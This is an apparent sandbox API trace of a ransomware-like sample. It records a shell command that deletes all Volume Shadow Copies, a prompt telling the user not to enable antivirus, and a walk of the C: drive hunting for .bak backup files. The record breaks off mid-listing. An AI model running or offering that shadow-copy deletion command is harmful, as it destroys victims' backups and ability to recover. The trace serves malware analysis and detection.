[0149.312] LocalAlloc (uFlags=0x0, uBytes=0x82) returned 0x708a58 [0149.312] ShellExecuteExW (in: pExecInfo=0x2128334*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C vssadmin delete shadows /all /quiet && wmic shadowcopy delete", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2128334*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="cmd.exe", lpParameters="/C vssadmin delete shadows /all /quiet && wmic shadowcopy delete", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x454)) returned 1 [0149.341] LocalFree (hMem=0x751488) returned 0x0 [0149.342] LocalFree (hMem=0x708a58) returned 0x0 [0149.342] GetCurrentProcess () returned 0xffffffff [0149.342] GetCurrentProcess () returned 0xffffffff [0149.342] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x454, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1af19c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x1af19c*=0x3c4) returned 1 [0149.342] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x1af194*=0x3c4, lpdwindex=0x1aefb4 | out: lpdwindex=0x1aefb4) returned 0x0 [0154.449] CloseHandle (hObject=0x3c4) returned 1 [0154.612] GetProcessWindowStation () returned 0xd0 [0154.694] GetUserObjectInformationA (in: hObj=0xd0, nIndex=1, pvInfo=0x212842c, nLength=0xc, lpnLengthNeeded=0x1af1c8 | out: pvInfo=0x212842c, lpnLengthNeeded=0x1af1c8) returned 1 [0154.694] GetActiveWindow () returned 0x0 [0154.696] GetModuleHandleW (lpModuleName="shell32.dll") returned 0x75690000 [0154.696] GetCurrentActCtx (in: lphActCtx=0x1af1bc | out: lphActCtx=0x1af1bc*=0x0) returned 1 [0154.696] ActivateActCtx (in: hActCtx=0x70b91c, lpCookie=0x1af1cc | out: hActCtx=0x70b91c, lpCookie=0x1af1cc) returned 1 [0154.700] OleInitialize (pvReserved=0x0) returned 0x0 [0154.701] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x1af184 | out: lplpMessageFilter=0x1af184*=0x0) returned 0x0 [0154.715] GetCurrentThreadId () returned 0xcb0 [0154.730] EnumThreadWindows (dwThreadId=0xcb0, lpfn=0x48d0936, lParam=0x0) returned 1 [0154.731] IsWindowVisible (hWnd=0x801f4) returned 0 [0154.731] IsWindowVisible (hWnd=0x801f6) returned 0 [0154.731] GetActiveWindow () returned 0x0 [0154.732] GetFocus () returned 0x0 [0154.734] MessageBoxW (hWnd=0x0, lpText="Loading please wait.... don't turn on the antivirus", lpCaption="", uType=0x0) returned 1 [0155.319] NtdllDefWindowProc_W (hWnd=0x801f4, Msg=0x1c, wParam=0x1, lParam=0x12a8) returned 0x0 [0155.698] DeactivateActCtx (dwFlags=0x0, ulCookie=0x1d760002) returned 1 [0155.699] SendMessageW (hWnd=0x0, Msg=0x7, wParam=0x0, lParam=0x0) returned 0x0 [0155.699] GetLogicalDrives () returned 0x4 [0155.700] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x1aecac, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0155.734] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af210) returned 1 [0155.742] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1aed18, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0155.777] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x1aecec, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0155.793] FindFirstFileW (in: lpFileName="C:\\*.bak", lpFindFileData=0x1aef38 | out: lpFindFileData=0x1aef38*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x78d17e5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78d17e5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78d17e5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 0x7375a8 [0155.794] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0155.813] FindFirstFileW (in: lpFileName="C:\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x7375a8 [0155.838] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b27f82, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0155.838] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xe47a48a8, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x78ab5a49, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x61b64, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0155.838] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xe5533ee0, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x78b27f82, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x2feb42d5, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTNXT", cAlternateFileName="")) returned 1 [0155.838] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x78d17e5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78d17e5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78d17e5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0155.839] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0155.839] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x551dbbfd, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x551dbbfd, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x67324923, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x332fe000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0155.839] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x85890a37, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x85890a37, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x6801c9ce, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x48000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0155.839] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbaec25, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xbaec25, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0155.840] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc4d44e3f, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xc4d44e3f, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0155.840] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x1b83b055, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x1b83b055, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0155.840] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x387f5bb4, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0155.840] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0xbaa998b0, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbadba904, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbadba904, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0155.840] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x858b6c65, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x858b6c65, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x68042bf5, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x10000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="swapfile.sys", cAlternateFileName="")) returned 1 [0155.841] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x85289733, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x2dbfc137, ftLastAccessTime.dwHighDateTime=0x1d70505, ftLastWriteTime.dwLowDateTime=0x2dbfc137, ftLastWriteTime.dwHighDateTime=0x1d70505, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0155.841] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 1 [0155.841] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0155.841] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0 [0155.841] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0155.842] FindFirstFileW (in: lpFileName="C:\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x78d17e5a, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78d17e5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78d17e5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 0x7375a8 [0155.842] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0155.843] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0155.843] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0155.844] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.844] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0155.844] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-1560258661-3990802383-1811730007-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0155.844] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-1560258661-3990802383-1811730007-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0155.844] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0155.845] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0155.845] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0155.846] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.846] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0155.847] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x77b1180e, ftCreationTime.dwHighDateTime=0x1d705ed, ftLastAccessTime.dwLowDateTime=0x77b1180e, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0x77b1180e, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0155.847] FindClose (in: hFindFile=0x7375a8 | out: hFindFile=0x7375a8) returned 1 [0155.847] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-18\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0155.847] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1560258661-3990802383-1811730007-1000\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0155.848] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.848] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0155.848] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x913b261b, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x913b261b, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x913b261b, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0155.848] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0155.848] FindFirstFileW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-1560258661-3990802383-1811730007-1000\\*.bak", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0155.849] FindFirstFileW (in: lpFileName="C:\\Boot\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7375a8 [0155.849] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x7898476d, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0x78b74525, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0x78b74525, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0155.851] FindNextFileW (in: hFindFile=0x7375a8, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78b74525, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xf555b9a2, ftLastAccessTime.dwHighDateTime=0x1d7e768, ftLastWriteTime.dwLowDateTime=0xf555b9a2, ftLastWriteTime.dwHighDateTime=0x1d7e768, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0155.851] FindNextFileW 